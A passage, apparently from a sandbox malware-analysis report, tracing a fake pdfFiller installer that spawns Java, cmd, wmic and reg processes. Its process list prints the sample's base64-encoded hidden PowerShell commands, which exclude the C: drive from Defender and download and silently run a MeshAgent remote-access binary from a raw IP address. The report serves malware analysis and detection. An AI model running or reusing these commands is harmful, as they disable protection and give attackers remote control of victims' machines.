36174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd942000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2156 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2156 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2156 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2156 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2156 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 3004 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp
PID 3004 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp
PID 3004 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp
PID 2932 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2932 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2932 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 3012 wrote to memory of 408 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 408 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 408 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 408 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 408 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 408 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 408 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3012 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3056 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3056 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3056 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3056 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3056 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3012 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3868 wrote to memory of 4036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3868 wrote to memory of 4036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3868 wrote to memory of 4036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3868 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3868 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3868 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3868 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3868 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3868 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3012 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1328 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1328 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1328 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1328 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1328 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1328 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1328 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1328 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3012 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 4268 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4268 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4268 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4268 wrote to memory of 3104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 4268 wrote to memory of 3104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

C:\Users\Admin\AppData\Local\Temp\Install(4).exe

"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"

C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

"C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp" /SL5="$B0092,6038703,916992,C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwOi8vNDYuOC4yMjcuMTYvdXBsb2Fkcy9tZXNoYWdlbnQzMi1tZXNoLnBuZyIKCiRvdXRwdXQgPSAiJGVudjpURU1QXG1lc2hhZ2VudDMyLW1lc2guZXhlIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRvdXRwdXQKCmlmIChUZXN0LVBhdGggJG91dHB1dCkgewogICAgdHJ5IHsKICAgICAgICAkcHJvY2Vzc1N0YXJ0ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbwogICAgICAgICRwcm9jZXNzU3RhcnQuRmlsZU5hbWUgPSAkb3V0cHV0CiAgICAgICAgJHByb2Nlc3NTdGFydC5Bcmd1bWVudHMgPSAiLWZ1bGxpbnN0YWxsIgogICAgICAgICRwcm9jZXNzU3RhcnQuV2luZG93U3R5bGUgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NXaW5kb3dTdHlsZV06OkhpZGRlbgogICAgICAgIFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OlN0YXJ0KCRwcm9jZXNzU3RhcnQpCiAgICB9CiAgICBjYXRjaCB7CiAgICB9Cn0KZWxzZSB7CiAKfQ==')); Invoke-Expression $script}"

C:\Program Files (x86)\pdfFiller\pdfFiller.exe

"C:\Program Files (x86)\pdfFiller\pdfFiller.exe"

C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe

"C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

